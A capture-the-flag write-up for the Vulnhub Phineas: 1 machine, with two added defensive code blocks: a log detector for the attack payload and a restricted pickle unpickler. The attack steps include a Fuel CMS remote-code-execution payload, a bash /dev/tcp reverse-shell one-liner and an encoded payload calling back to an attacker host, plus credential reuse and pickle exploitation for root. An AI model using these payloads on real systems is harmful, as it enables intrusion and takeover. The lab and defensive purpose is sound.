Vulnhub Phineas: 1 Write-up!

Vishal
Apr 25, 2021

Hi guys! In this write-up we will see how to get root on the Phineas: 1 Vulnhub machine.

Let’s start with an nmap scan to find all open ports. The result shows a total of 4 open ports: 22, 80, 111 and 3306.

nmap open ports

Now let’s find the service versions on the above open ports.

nmap service version detection

Let’s open the IP in a browser: nothing interesting.

Time to enumerate the web directories and files. Only one directory was found.

Visiting /structure shows below page.

This time let’s use gobuster and see what we get:

Let’s open robots.txt; it shows /fuel, and the same is also shown by the gobuster scan.

Let’s use gobuster one more time on /structure/fuel.

I opened /structure/index.php/fuel/login and it gave me the below page.

fuel CMS

This confirms that Fuel CMS is running. To find an exploit, if any, I searched on Google for a Fuel CMS exploit. It looks like Fuel CMS is vulnerable to RCE.

The exploit shows that the path “fuel/pages/select/?filter=” is vulnerable to RCE. I used the below payload, shown after filter, to simply run the ‘ls’ command.

http://192.168.9.90/structure/index.php/fuel/pages/select/?filter=%27%25%32%42%70%69%28%70%72%69%6e%74%28%25%32%34%61%25%33%44%27%73%79%73%74%65%6d%27%29%29%25%32%42%25%32%34%61%28%27%6c%73%27%29%25%32%42%27

'%2Bpi(print(%24a%3D'system'))%2B%24a('ls')%2B' (the URL-decoded value of the above string)

After doing this, when I open the page, it shows me nothing.

But when I checked the page source of the same page, I got the result of the ‘ls’ command.

I set up the Burp proxy and sent the request to the Repeater tab. This time I used the hostname command, and below is the result.
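From the defender's side, the request above is easy to spot in web-server logs once the double URL encoding is undone: the filter parameter of pages/select is meant to hold a plain search term, so a value that decodes to PHP-like syntax (quotes, parentheses, a `$` variable) or that needs two decoding rounds is a strong signal. The following detector is an added example written for this write-up, not code from the post or from Fuel CMS; the log lines are constructed, and the only payload in them is the one already shown above.

```python
import re
from urllib.parse import unquote, urlparse

# Constructed sample access-log lines for this example. The first request carries the
# double-URL-encoded filter string shown in the write-up; the others are ordinary traffic.
SAMPLE_LOG = """\
192.168.9.3 - - [25/Apr/2021:10:01:02 +0000] "GET /structure/index.php/fuel/pages/select/?filter=%27%25%32%42%70%69%28%70%72%69%6e%74%28%25%32%34%61%25%33%44%27%73%79%73%74%65%6d%27%29%29%25%32%42%25%32%34%61%28%27%6c%73%27%29%25%32%42%27 HTTP/1.1" 200 512
192.168.9.3 - - [25/Apr/2021:10:01:30 +0000] "GET /structure/index.php/fuel/pages/select/?filter=about HTTP/1.1" 200 2048
192.168.9.3 - - [25/Apr/2021:10:02:00 +0000] "GET /structure/robots.txt HTTP/1.1" 200 33
"""

# Common-log-format fields we need: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that have no business in a legitimate page filter but are needed to write code.
PHP_META = "()$'\";`"


def fully_decode(value, max_rounds=5):
    """URL-decode until the value stops changing; return (decoded, rounds_needed)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
        rounds += 1
    return value, rounds


def analyse_request(target):
    """Return a finding for a pages/select request whose filter looks like code, else None."""
    parsed = urlparse(target)
    if not parsed.path.rstrip("/").endswith("/fuel/pages/select"):
        return None
    # Split the query by hand so we see the raw, still-encoded value and can count rounds.
    for pair in parsed.query.split("&"):
        key, _, raw = pair.partition("=")
        if key != "filter":
            continue
        decoded, rounds = fully_decode(raw)
        reasons = []
        if rounds >= 2:
            reasons.append("double-encoded")
        if any(ch in decoded for ch in PHP_META):
            reasons.append("code-like characters in filter")
        if reasons:
            return {"decoded": decoded, "rounds": rounds, "reasons": reasons}
    return None


def scan_log(text):
    """Run analyse_request over every parsable log line and collect the findings."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = analyse_request(m.group("target"))
        if finding:
            finding["ip"] = m.group("ip")
            finding["ts"] = m.group("ts")
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["reasons"], "->", f["decoded"])
```

Decoding is done by repeated `unquote` rather than a single pass because, as the payload above shows, the attacker encoded the string twice so that the first decode (done by the web server) still leaves an innocuous-looking value; the number of rounds is itself recorded as evidence.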

Time to get the shell on the box:

Start a netcat listener on port 443 on the Kali machine to catch the reverse shell. We will use the below payload to get the reverse shell. Change the IP and port as per your system.

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

Final payload:

%27%25%32%42%70%69%28%70%72%69%6e%74%28%25%32%34%61%25%33%44%27%73%79%73%74%65%6d%27%29%29%25%32%42%25%32%34%61%28%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%39%2e%33%2f%34%34%33%20%30%3e%26%31%27%29%25%32%42%27

Got the shell on the box:

Like WordPress has wp-config.php, Fuel CMS has a database.php file which contains the database name, username and password. The location of the file is “/var/www/html/structure/fuel/application/config”.

database.php file

I checked the /etc/passwd file to get the names of potential users, and I saw that anna is present on the system.

anna user

After trying SSH with the user anna and the password from the database.php file, I am able to log in.

In /home/anna, there is a directory called “web” which has the below contents.

When I used the netstat -antp command, I saw something is running on port 5000.

I used the curl command to request localhost on port 5000.

Port Forwarding.

I used port forwarding to forward it to my local host on port 5000. Nmap shows the service running on it.

From app.py it shows that it is using pickle. Pickle is a serialization module in Python, and unpickling untrusted data with it can lead to RCE.

As written in app.py, the user needs to send a POST request to the endpoint heaven with data in the awesome parameter, which the app then passes to pickle. I searched for how to exploit pickle to get RCE. This gave me the result.

To understand the concept, please read the article. I copied the code from the link and changed it to give me a reverse shell.
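The reason pickle is dangerous here is that a pickle stream can name any importable global and have the unpickler call it; stock `pickle.loads` resolves such references without question. The code below is an added example for this write-up, not the machine's app.py and not code from the linked article: `unsafe_loads` mirrors the "request bytes straight into pickle" pattern described above in generic form, and `RestrictedUnpickler` shows the fix recommended in the Python documentation, overriding `find_class` so only a short allow-list of plain builtin types can be resolved. The two sample streams are constructed; the second references `collections.OrderedDict`, a harmless stand-in that exercises the same global-lookup mechanism a malicious stream relies on.

```python
import builtins
import collections
import io
import pickle

# Types an unpickler may legitimately need for plain data. Everything else,
# including any module-level function or class, is refused.
SAFE_BUILTINS = frozenset({"dict", "list", "tuple", "set", "frozenset",
                           "str", "bytes", "int", "float", "bool"})


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve arbitrary globals.

    The GLOBAL / STACK_GLOBAL opcodes call find_class() to import and return a
    module attribute; a crafted stream uses that to obtain a callable and have
    REDUCE invoke it. Limiting find_class() to a small allow-list closes that path.
    """

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def unsafe_loads(data):
    # The pattern the write-up describes: request bytes handed straight to pickle.
    # Any global referenced in the stream is imported and may be called.
    return pickle.loads(data)


def restricted_loads(data):
    """Deserialize with the allow-listed unpickler instead of pickle.loads."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def classify(data):
    """Return ("accepted", obj) or ("rejected", reason) for a pickle stream."""
    try:
        return "accepted", restricted_loads(data)
    except pickle.UnpicklingError as exc:
        return "rejected", str(exc)


# Constructed inputs for the demonstration (not taken from the target machine).
# The benign stream holds only plain containers and scalars.
BENIGN_PICKLE = pickle.dumps({"user": "anna", "roles": ["web"]})
# This stream references the global collections.OrderedDict. It is harmless, but it
# exercises exactly the mechanism (resolving a named global) that a malicious stream
# abuses, so a restricted unpickler must reject it.
GLOBAL_REF_PICKLE = pickle.dumps(collections.OrderedDict(a=1))

if __name__ == "__main__":
    print(classify(BENIGN_PICKLE))
    print(classify(GLOBAL_REF_PICKLE))
    # Stock pickle.loads resolves the global without complaint:
    print(type(unsafe_loads(GLOBAL_REF_PICKLE)).__name__)
```

For a web endpoint that only needs to carry plain data, the better fix is to not use pickle at all and accept JSON; the restricted unpickler is for cases where the wire format cannot be changed, and it should be paired with authentication on the endpoint, since an allow-list only limits what a stream can resolve, not who can submit one.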

Before sending the request to the application on port 5000, create the payload and start the netcat listener on port 4444 on the Kali machine.

Payload generated using the exploit:

Got a root shell on port 4444 on the Kali machine.

user and root flags.

Hope you guys like it. Thanks for reading!!
